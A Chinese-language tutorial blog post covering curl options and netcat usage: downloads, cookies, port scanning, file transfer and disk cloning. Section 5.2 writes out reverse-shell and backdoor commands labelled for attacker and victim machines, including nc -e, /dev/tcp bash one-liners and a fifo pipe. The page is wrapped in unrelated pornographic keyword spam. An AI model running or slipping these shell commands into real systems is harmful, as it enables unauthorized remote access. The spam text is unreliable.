<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      linux學習:curl與netcat用法整理

      CURL

      語法: curl [option] [url]

      常用參數:
      -A/--user-agent <string> 設置用戶代理發送給服務器
      -b/--cookie <name=string/file> cookie字符串或文件讀取位置
      -c/--cookie-jar <file> 操作結束后把cookie寫入到這個文件中
      -C/--continue-at <offset> 斷點續轉
      -D/--dump-header <file> 把header信息寫入到該文件中
      -e/--referer 來源網址
      -f/--fail 連接失敗時不顯示http錯誤
      -o/--output 把輸出寫到該文件中
      -O/--remote-name 把輸出寫到該文件中,保留遠程文件的文件名
      -r/--range <range> 檢索來自HTTP/1.1或FTP服務器字節范圍
      -s/--silent 靜音模式。不輸出任何東西
      -T/--upload-file <file> 上傳文件
      -u/--user <user[:password]> 設置服務器的用戶和密碼
      -w/--write-out [format] 什么輸出完成后
      -x/--proxy <host[:port]> 在給定的端口上使用HTTP代理
      -#/--progress-bar 進度條顯示當前的傳送狀態


      例子:
      1.1、訪問網址,打印響應的內容(html代碼)
      curl http://www.test.com

      1.2、參數-f顯示抓取錯誤,
      curl -f http://www.test.com/error

      1.3、保存訪問的文件
      curl http://www.test.com >> test.html

      1.4、可以使用curl的內置option:-o(小寫)保存網頁
      curl -o test.html http://www.test.

      1.5、參數-O(大寫)保存網頁中的文件,注意url要具體到某個文件,不然抓不下來,比如http://www.test.com/page/2/ 是無法抓取的
      curl -O http://www.test.com/hello.xml

      1.6、測試網頁返回值,在腳本中,這是很常見的測試網站是否正常的用法,一般返回200
      curl -o /dev/null -s -w %{http_code} www.test.com

      1.7、指定proxy服務器以及其端口,參數 -x 用來支持設置代理
      curl -x 192.168.100.100:1080 http://www.test.com

      1.8、選項-u完成HTTP或FTP認證
      curl -u username:password http://www.test.com

      1.9、只使用username,后續運行提示輸入密碼
      curl -u username http://www.test.com     

       


      2.1、參數 -o(小寫)下載文件,下載到本地的文件需自己命名
      curl -o img1.jpg http:www.test.com/img1.jpg
      同時下載多個文件
      curl -o img1.jpg http://www.test.com/img1.jpg -o img2.jpg http://www.test.com/img2.jpg

      2.2、參數 -O(大寫)以服務器上的名稱保存文件到本地
      curl -O http://www.test.com/img1.jpg

      2.3、循環下載,下載部分文件。例如把img1,img2,img3下載下來
      curl -O http://www.test.com/img[1-3].jpg

      2.4、分別下載目標完整aa和bb目錄下的img1、img2和img3圖片,但第二次下載的會把第一次下載的覆蓋。
      curl -O http://www.test.com/{aa,bb}/dodo[1-3].jpg

      2.5、這樣在aa/img1.jpg的文件下載下來就會變成aa_img1.jpg,其他文件依此類推,從而避免了文件被覆蓋
      curl -o #1_#2.img http://www.test.com/{aa,bb}/img[1-3].jpg

      2.6、分塊下載,對于大文件,使用參數 -r 實現分段下載
      curl -r 0-100 -o img_part1.jpg http://www.test.com/img.jpg
      curl -r 100-200 -o img_part2.jpg http://www.test.com/img.jpg
      curl -r 200- -o img_part3.jpg http://www.test.com/img.jpg
      cat img_part* > img.jpg
      這樣就可以查看img.jpg的內容了

      2.7、通過ftp下載文件,curl提供兩種從ftp中下載的語法
      curl -O -u 用戶名:密碼 ftp://www.test.com/img.jpg
      curl -O ftp://用戶名:密碼@www.test.com/img.jpg

      2.8、顯示下載進度條
      curl -# -O http://www.test.com/img.jpg

      2.9、不會顯示下載進度信息
      curl -s -O http://www.test.com/img.jpg

      2.10、斷點續傳,如果在下載dodo1.jpg的過程中突然掉線了,可以使用參數-C實現續傳
      curl -C -O http://www.test.com/img.jpg

      2.11、#選項--limit-rate限制curl的下載速度
      curl --limit-rate 20k http:/www.test.com/img.jpg

      2.12、選項--max-filesize指定可下載的最大文件大小。若文件大小超出限制,命令返回一個非0的退出嗎,若正常運行,則返回0    
      curl --max-filesize bytes http://www.test.com/img.jpg   

      2.13、上傳文件,-T來實現向ftp服務器上傳了文件test.jpg
      curl -T test.jpg -u 用戶名:密碼 ftp://www.test.com/img/

       


      3.1、可以使用 -I 選項顯示 HTTP 頭,而不顯示文件內容
      curl -I http://www.test.com

      3.2、使用 -i 選項可以同時顯示 HTTP 頭和文件內容,
      curl -i http://www.codebelief.com

      3.3、參數 -L 跟隨鏈接重定向,假如http://a.test.com是重定向到http://www.test.com,使用-L參數,讓CURL像瀏覽器一樣跟隨連接的重定向,獲取重定向后的頁面的內容
      curl http://a.test.com

      3.4、 使用 -A 自定義 User-Agent
      curl -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" http://www.test.com

      3.5、使用 -H 自定義 header。當我們使用 -H 來自定義 User-Agent 時,需要使用 "User-Agent: xxx" 的格式。
      curl -H "Referer: www.test.com" -H "User-Agent: Custom-User-Agent" http://www.baidu.com
      同時也可以直接在 header 中傳遞 Cookie,格式與上面的例子一樣:
      curl -H "Cookie: JSESSIONID=GO322A5063D938589F9G9S9EF8F939K89B" http://www.test.com

      3.6、偽造referer(盜鏈),參數 -e 可以設定referer頭
      curl -e "www.test.com" http://mail.test.com

       


      4.1、使用 -d 發送 POST 請求,參數 -X 用于指定發送數據的方式:
      curl -d "userName=tom&passwd=123456" -X POST http://www.test.com/login
      在使用 -d 的情況下,如果省略 -X,則默認為 POST 方式:
      curl -d "userName=tom&passwd=123456" http://www.test.com/login

      4.2、從文件中讀取數據發送post請求
      curl -d "@data.txt" http://www.test.com/login

      4.3、在使用 -d 的情況下,強制使用 GET 方式:
      curl -d "somedata" -X GET http://www.test.com/api
      或者使用 -G 選項:
      curl -d "somedata" -G http://www.test.com/api

      4.4、參數-c(小寫)保存http的response里面的cookie信息。執行后cookie信息就被存到了cookiec.txt里面了
      curl -c cookiec.txt http://www.test.com

      4.5、參數-D保存http的response里面的header信息。執行后cookie信息就被存到了cookied.txt里面了,注意:-c(小寫)產生的cookie和-D里面的cookie是不一樣的。
      curl -D cookied.txt http://www.test.com

      4.6:使用cookie,參數-b 帶上cookie信息訪問網址
      curl -b cookiec.txt http://www.test.com
      curl -b "JSESSIONID=D0112A5063D938586B659EF8F939BE24" http://www.test.com

      4.7、帶 Cookie 登錄
      登錄時保存cookie
      curl -c "cookie-login" -d "username=test&passwd=123456" http://www.test.com/login
      再次訪問該網站時(訪問登錄后的頁面),帶上cookie訪問:
      curl -b "cookie-login" http://www.test.com/login

       


      其他參數
      -a/--append 上傳文件時,附加到目標文件
      --anyauth 可以使用“任何”身份驗證方法
      --basic 使用HTTP基本驗證
      -B/--use-ascii 使用ASCII文本傳輸
      -d/--data <data> HTTP POST方式傳送數據
      --data-ascii <data> 以ascii的方式post數據
      --data-binary <data> 以二進制的方式post數據
      --negotiate 使用HTTP身份驗證
      --digest 使用數字身份驗證
      --disable-eprt 禁止使用EPRT或LPRT
      --disable-epsv 禁止使用EPSV
      --egd-file <file> 為隨機數據(SSL)設置EGD socket路徑
      --tcp-nodelay 使用TCP_NODELAY選項
      -E/--cert <cert[:passwd]> 客戶端證書文件和密碼 (SSL)
      --cert-type <type> 證書文件類型 (DER/PEM/ENG) (SSL)
      --key <key> 私鑰文件名 (SSL)
      --key-type <type> 私鑰文件類型 (DER/PEM/ENG) (SSL)
      --pass <pass> 私鑰密碼 (SSL)
      --engine <eng> 加密引擎使用 (SSL). "--engine list" for list
      --cacert <file> CA證書 (SSL)
      --capath <directory> CA目 (made using c_rehash) to verify peer against (SSL)
      --ciphers <list> SSL密碼
      --compressed 要求返回是壓縮的形勢 (using deflate or gzip)
      --connect-timeout <seconds> 設置最大請求時間
      --create-dirs 建立本地目錄的目錄層次結構
      --crlf 上傳是把LF轉變成CRLF
      --ftp-create-dirs 如果遠程目錄不存在,創建遠程目錄
      --ftp-method [multicwd/nocwd/singlecwd] 控制CWD的使用
      --ftp-pasv 使用 PASV/EPSV 代替端口
      --ftp-skip-pasv-ip 使用PASV的時候,忽略該IP地址
      --ftp-ssl 嘗試用 SSL/TLS 來進行ftp數據傳輸
      --ftp-ssl-reqd 要求用 SSL/TLS 來進行ftp數據傳輸
      -F/--form <name=content> 模擬http表單提交數據
      -form-string <name=string> 模擬http表單提交數據
      -g/--globoff 禁用網址序列和范圍使用{}和[]
      -G/--get 以get的方式來發送數據
      -h/--help 幫助
      -H/--header <line> 自定義頭信息傳遞給服務器
      --ignore-content-length 忽略的HTTP頭信息的長度
      -i/--include 輸出時包括protocol頭信息
      -I/--head 只顯示文檔信息
      -j/--junk-session-cookies 讀取文件時忽略session cookie
      --interface <interface> 使用指定網絡接口/地址
      --krb4 <level> 使用指定安全級別的krb4
      -k/--insecure 允許不使用證書到SSL站點
      -K/--config 指定的配置文件讀取
      -l/--list-only 列出ftp目錄下的文件名稱
      --limit-rate <rate> 設置傳輸速度
      --local-port<NUM> 強制使用本地端口號
      -m/--max-time <seconds> 設置最大傳輸時間
      --max-redirs <num> 設置最大讀取的目錄數
      --max-filesize <bytes> 設置最大下載的文件總量
      -M/--manual 顯示全手動
      -n/--netrc 從netrc文件中讀取用戶名和密碼
      --netrc-optional 使用 .netrc 或者 URL來覆蓋-n
      --ntlm 使用 HTTP NTLM 身份驗證
      -N/--no-buffer 禁用緩沖輸出
      -p/--proxytunnel 使用HTTP代理
      --proxy-anyauth 選擇任一代理身份驗證方法
      --proxy-basic 在代理上使用基本身份驗證
      --proxy-digest 在代理上使用數字身份驗證
      --proxy-ntlm 在代理上使用ntlm身份驗證
      -P/--ftp-port <address> 使用端口地址,而不是使用PASV
      -Q/--quote <cmd> 文件傳輸前,發送命令到服務器
      --range-file 讀取(SSL)的隨機文件
      -R/--remote-time 在本地生成文件時,保留遠程文件時間
      --retry <num> 傳輸出現問題時,重試的次數
      --retry-delay <seconds> 傳輸出現問題時,設置重試間隔時間
      --retry-max-time <seconds> 傳輸出現問題時,設置最大重試時間
      -S/--show-error 顯示錯誤
      --socks4 <host[:port]> 用socks4代理給定主機和端口
      --socks5 <host[:port]> 用socks5代理給定主機和端口
      -t/--telnet-option <OPT=val> Telnet選項設置
      --trace <file> 對指定文件進行debug
      --trace-ascii <file> Like --跟蹤但沒有hex輸出
      --trace-time 跟蹤/詳細輸出時,添加時間戳
      --url <URL> Spet URL to work with
      -U/--proxy-user <user[:password]> 設置代理用戶名和密碼
      -V/--version 顯示版本信息
      -X/--request <command> 指定什么命令
      -y/--speed-time 放棄限速所要的時間。默認為30
      -Y/--speed-limit 停止傳輸速度的限制,速度時間'秒
      -z/--time-cond 傳送時間設置
      -0/--http1.0 使用HTTP 1.0
      -1/--tlsv1 使用TLSv1(SSL)
      -2/--sslv2 使用SSLv2的(SSL)
      -3/--sslv3 使用的SSLv3(SSL)
      --3p-quote like -Q for the source URL for 3rd party transfer
      --3p-url 使用url,進行第三方傳送
      --3p-user 使用用戶名和密碼,進行第三方傳送
      -4/--ipv4 使用IP4
      -6/--ipv6 使用IP6

       

       

      netcat

      注意:ubuntu自帶的nc是netcat-openbsd版,不帶-c/-e參數。

      ubuntu可通過命令來查看版本:readlink -f $(which nc

      • /bin/nc.traditional  默認 GNU 基礎版本,一般系統自帶。
      • /bin/nc.openbsd           openbsd  版本,強大很多。

      ubuntu安裝:apt-get install nc-openbsd   或者   apt-get install nc-traditional

      windows安裝exe文件下載地址:https://eternallybored.org/misc/netcat/

       

      參數
      想要連接到某處: nc [-options] hostname port[s] [ports] …
      綁定端口等待連接: nc -l port [-options] [hostname] [port]

      • -c shell commands shell模式
      • -e filename 程序重定向 [危險!!]
      • -b 允許廣播
      • -d 無命令行界面,使用后臺模式
      • -g gateway   設置源路由跳躍點, 不超過8
      • -G num   設置源路由指示器,數值為4的倍數: 4, 8, 12, ...
      • -h   獲取幫助信息
      • -i secs   設置時間間隔,以便傳送信息及掃描通信端口: -i 3
      • -k    設置在socket上的存活選項
      • -l     監聽入站信息
      • -n    直接使用ip地址,而不通過域名服務器
      • -o file     指定文件名稱,把往來傳輸的數據以16進制字碼傾倒成該文件保存:-o /mydata/test.txt
      • -p port   設置本地端口:-p 8080
      • -r   指定源端口和目的端口都進行隨機的選擇
      • -q secs   在標準輸入且延遲后退出(翻譯的不是很好,后面實例介紹)
      • -s addr   設置本地主機送出數據包的IP地址
      • -T tos   設置服務類型
      • -t   以TELNET的形式應答入站請求
      • -u   使用UDP協議模式
      • -v   顯示詳細信息 [使用-vv獲取更詳細的信息]
      • -w <secs>   連接超時設置,比如連接5秒超時: -w 5 
      • -z   使用輸入/輸出(I/O) 模式 [掃描通信端口時使用]

      假設服務器A的IP:192.168.0.11
      假設服務器B的IP:192.168.0.12

      文章部分例子中使用的端口為 4403 ,實際使用根據使用者修改。

      1.1、端口掃描
      nc -z -v -n 192.168.0.11 21-25

      可以運行在TCP或者UDP模式,默認是TCP,-u參數調整為udp.
      z 參數告訴netcat使用0 IO,連接成功后立即關閉連接,不進行數據交換
      v 參數指使用冗余選項(譯者注:即詳細輸出)
      n 參數告訴netcat 不要使用DNS反向查詢IP地址的域名

      1.2、連接開放端口21并且打印運行在這個端口上服務的banner信息。
      nc -v 192.168.0.11 21

       

      2、聊天服務,建立連接后兩邊機器輸入的信息都能顯示在另一臺連接上的機器

      服務器A(服務端)執行:nc -l 4403
      服務器B(客戶端)執行:nc 192.168.0.11 4403

       

      3.1、文件傳輸(A傳給B,相當于B從A下載文件)
      服務器A(服務端)執行:nc -l 4403 < file.txt
      服務器B(客戶端)執行:nc -n 192.168.0.11 4403 > file.txt

      3.2、傳輸server創建在B(客戶端)上,A(服務端)接收文件(B傳給A):

      服務器A(服務端):nc -l 4403 > file.txt
      服務器B(客戶端):nc 192.168.0.11 4403 < file.txt
      當需要將客戶端子網中某臺機器傳輸文件到外網上的某臺服務器上時適用,相當于上傳文件

      3.3、目錄傳輸(從A傳輸到B),歸檔-傳輸-下載-解壓
      服務器A(服務端):tar -cvf – dir_name | nc -l 4403
      服務器B(客戶端):nc -n 192.168.0.11 4403 | tar -xvf -

      3.4、如果想要節省帶寬傳輸壓縮包,我們可以使用bzip2或者其他工具壓縮。
      服務器A(服務端):tar -cvf – dir_name| bzip2 -z | nc -l 4403
      服務器B(客戶端):nc -n 192.168.0.11 4403 | bzip2 -d |tar -xvf -

      3.4、備份檔案
      服務器A(服務端):tar czf - work|nc -l -c -p 1234
      服務器B(客戶端):nc 192.168.0.1 1234 >a.tgz

      3.5、 加密你通過網絡發送的數據,使用mcrypt工具解密數據。以下兩個命令會提示需要密碼,確保兩端使用相同的密碼
      服務器A(服務端):nc localhost 4403 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
      服務器B(客戶端):mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 4403

      3.6、流視頻
      服務器A(服務端):cat video.avi | nc -l 4403
      服務器B(客戶端):nc 192.168.0.11 4403 | mplayer -vo x11 -cache 3000 -

       

      4、克隆一個設備
      克隆Linux PC很簡單,假如你的系統在磁盤/dev/sda上
      dd是一個從磁盤讀取原始數據的工具,我通過netcat服務器重定向它的輸出流到其他機器并且寫入到磁盤中,它會隨著分區表拷貝所有的信息。但是如果我們已經做過分區并且只需要克隆root分區,我們可以根據我們系統root分區的位置,更改sda 為sda1,sda2.等等。
      服務器A(服務端):dd if=/dev/sda | nc -l 4403
      服務器B(客戶端):nc -n 192.168.0.11 4403 | dd of=/dev/sda

       


      5.1、創建遠程shell,假設本地netcat支持 -c -e 參數(默認 netcat)
      服務器A(服務端):nc -l 4403 -e /bin/bash -i
      服務器B(客戶端):nc 192.168.0.11 4403

      假如netcat 不支持-c 或者 -e 參數(openbsd netcat),我們仍然能夠創建遠程shell
      服務器A(服務端):
      $mkfifo /tmp/tmp_fifo
      $cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 4403 > /tmp/tmp_fifo
      這里我們創建了一個fifo文件,然后使用管道命令把這個fifo文件內容定向到shell 2>&1中。是用來重定向標準錯誤輸出和標準輸出,然后管道到netcat 運行的端口4403上。至此,我們已經把netcat的輸出重定向到fifo文件中。
      說明:
      從網絡收到的輸入寫到fifo文件中
      cat 命令讀取fifo文件并且其內容發送給sh命令
      sh命令進程受到輸入并把它寫回到netcat。
      netcat 通過網絡發送輸出到client
      至于為什么會成功是因為管道使命令平行執行,fifo文件用來替代正常文件,因為fifo使讀取等待而如果是一個普通文件,cat命令會盡快結束并開始讀取空文件。
      服務器B(客戶端):
      $nc -n 192.168.0.11 4403

      5.2、反向shell(后門)
      1)反向shell是指在客戶端打開的shell。反向shell這樣命名是因為不同于其他配置,這里服務器使用的是由客戶提供的服務。反向shell經常被用來繞過防火墻的限制,如阻止入站連接。例如,我有一個專用IP地址為192.168.1.11,我使用代理服務器連接到外部網絡。如果我想從網絡外部訪問 這臺機器如1.2.3.4的shell,那么我會用反向外殼用于這一目的。
      服務器A(服務端):nc -l 4403
      服務器B(客戶端):nc 192.168.0.11 4403 -e /bin/bash

      2)受害者的機器(服務端) :
      nc -l -p port -e cmd.exe     // windows
      nc -l -p port -e /bin/sh        // unix,linux
      nc -lp port -c cmd     //windows
      nc -lp port -c bash    //linux

      攻擊者的機器(客戶端):.
      nc ip -p port    // 連接受害者機器IP,然后得到一個shell。

      3)不使用-e選項反彈shell
      攻擊方先執行(服務端):
      nc -lnvp 4430
      被攻擊方再執行(客戶端):(如果非root賬戶無法執行mknod,則使用mkfifo /tmp/backpipe也可以創建一個管道。)
      mknod /tmp/backpipe p
      /bin/sh 0</tmp/backpipe | nc 192.168.0.11 4430 1>/tmp/backpipe

      4)攻擊者(服務端):
      nc -vv -l -p
      受害者(客戶端):
      nc -e cmd.exe 192.168.0.11 -p 4403
      nc -e /bin/sh 192.168.0.11 -p 4403

      5)攻擊者(服務端):
      nc -vv -l -p 4403
      nc -vv -l -p 4404
      受害者(客戶端):
      nc 192.168.0.11 4403 | cmd.exe | nc 192.168.0.11 4404
      nc 192.168.0.11 4403 | /bin/sh | nc 192.168.0.11 4404

      6)Bash反彈
      攻擊者(服務端,IP:192.168.0.11):
      nc -lvvp 4403
      受害者(客戶端):
      bash -c 'sh -i &>/dev/tcp/192.168.0.11/4403 0>&1'
      或者
      bash -i >& /dev/tcp/192.168.0.11/4403 0>&1
      或者
      a=`bash -i >& /dev/tcp/192.168.0.11/4403 0>&1`;curl -d ${a} http://192.168.0.11/4403



      6.1、指定源端口通訊,假設防火墻過濾除25端口外其它所有端口,則需要使用-p選項指定源端口。客戶端開啟25端口用于通訊,否則將使用隨機端口。
      服務器A(服務端):nc -l 4403
      服務器B(客戶端):nc 192.168.0.11 4403 -p 25

      6.2、多ip時指定源地址通訊,假設你的機器有多個地址,希望明確指定使用哪個地址用于外部數據通訊。我們可以在netcat中使用-s選項指定ip地址。該命令將綁定地址192.168.0.13。
      服務器A(服務端):nc -u -l 4403 < file.txt
      服務器B(客戶端):nc -u 192.168.0.11 4403 -s 192.168.0.13 > file.txt

       

      7、用nc命令操作memcached
      存儲數據:printf "setkey 0 10 6rnresultrn” |nc 192.168.0.11 11211
      獲取數據:printf “get keyrn” |nc 192.168.0.11 11211
      刪除數據:printf “delete keyrn” |nc 192.168.0.11 11211
      查看狀態:printf "statsrn” |nc 192.168.0.11 11211
      模擬top命令查看狀態:watch “echo stats” |nc 192.168.0.11 11211
      清空緩存:printf “flush_allrn” |nc 192.168.0.11 11211


      8.1、在測試郵件服務器是否正常時,手動使用 SMTP 協議發送郵件
      $nc localhost 25 << EOF
      HELO host.example.com
      MAIL FROM: <user@host.example.com>
      RCPT TO: <user2@host.example.com>
      DATA
      Body of email.
      .
      QUIT
      EOF

      8.2、模擬HTTP Headers,訪問一個網站,輸入后雙回車獲取響應內容
      $nc www.215814.com 80
      GET / HTTP/1.1
      Host: ispconfig.org
      Referrer: mypage.com
      User-Agent: my-browser

       

      9、其他
      建立從本地1234端口到www.test.com的80端口連接,5秒超時
      nc -p 1234 -w 5 www.test.com 80

      u為UDP連接
      nc -u www.test.com 53

      掃描端口(70到80),可指定范圍。-v輸出詳細信息。
      nc -v -z www.test.com 70-80

      開啟服務并監聽本地主機TCP80端口(-p 可以省略):
      nc -l -p 80

      nc -l 80

       

      監聽本地主機TCP80端口并將訪問信息記錄下來
      nc -l -p 80 >>/log/listen.log

      使用'-L'(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c為止
      nc -L -p 80

      打開本地的7626端口進行監聽,并反饋連接信息。
      nc -l -v -p 7626

      使用'-L'可以不停地監聽某一個端口,直到ctrl+c為止,同時把結果輸出到'c:/log.txt'中,如果把‘>' 改為‘>>'即可以追加日志
      nc -L -p 80 > c:/log.txt

      連到192.168.0.11的TCP80端口
      nc -nvv 192.168.0.11 80

      連接到192.168.0.11的80端口,并在其管道中發送'/test.txt'的內容(攻擊程序)
      nc -nvv 192.168.0.11 80 < /test.txt

      端口數據抓包.
      nc -vv -w 2 -o test.txt xfocus.Net 80 21-15

       

      posted @ 2018-11-15 17:33  喜歡哲學的猴子  閱讀(1736)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 国产一区二区三区高清视频| 最新精品国偷自产在线美女足| 庆城县| 好男人社区在线www| 亚洲精品一区二区三天美| 国产日韩一区二区天美麻豆| 黎川县| 国产乱码日韩亚洲精品成人| 日韩精品区一区二区三vr| 亚洲人成亚洲人成在线观看| 乱60一70归性欧老妇| 色综合久久人妻精品日韩| 91人妻无码成人精品一区91| 人妻无码| 精品一区二区亚洲国产| 呦系列视频一区二区三区| 无码日韩精品一区二区三区免费| 日本毛茸茸的丰满熟妇| 亚洲の无码国产の无码步美| 国产91精品一区二区蜜臀| 亚洲精品一区久久久久一品av| 欧洲精品色在线观看| 人妻出轨av中文字幕| 国产一区二区精品自拍| 无码精品人妻一区二区三区中 | 亚洲欧美一区二区三区图片| 丰满爆乳一区二区三区| 亚洲AV无码破坏版在线观看| 久久精品夜夜夜夜夜久久 | 国产成人久久综合第一区| 国产精品一区 在线播放| 夜爽8888视频在线观看| 欧美亚洲h在线一区二区| 亚洲国产精品一二三四区| 中文成人无字幕乱码精品区| 久久香蕉欧美精品| 在线看片免费人成视频久网 | 噜妇插内射精品| 精品亚洲国产成人av| 亚洲熟妇无码另类久久久| 国产精品久久久久久久久鸭|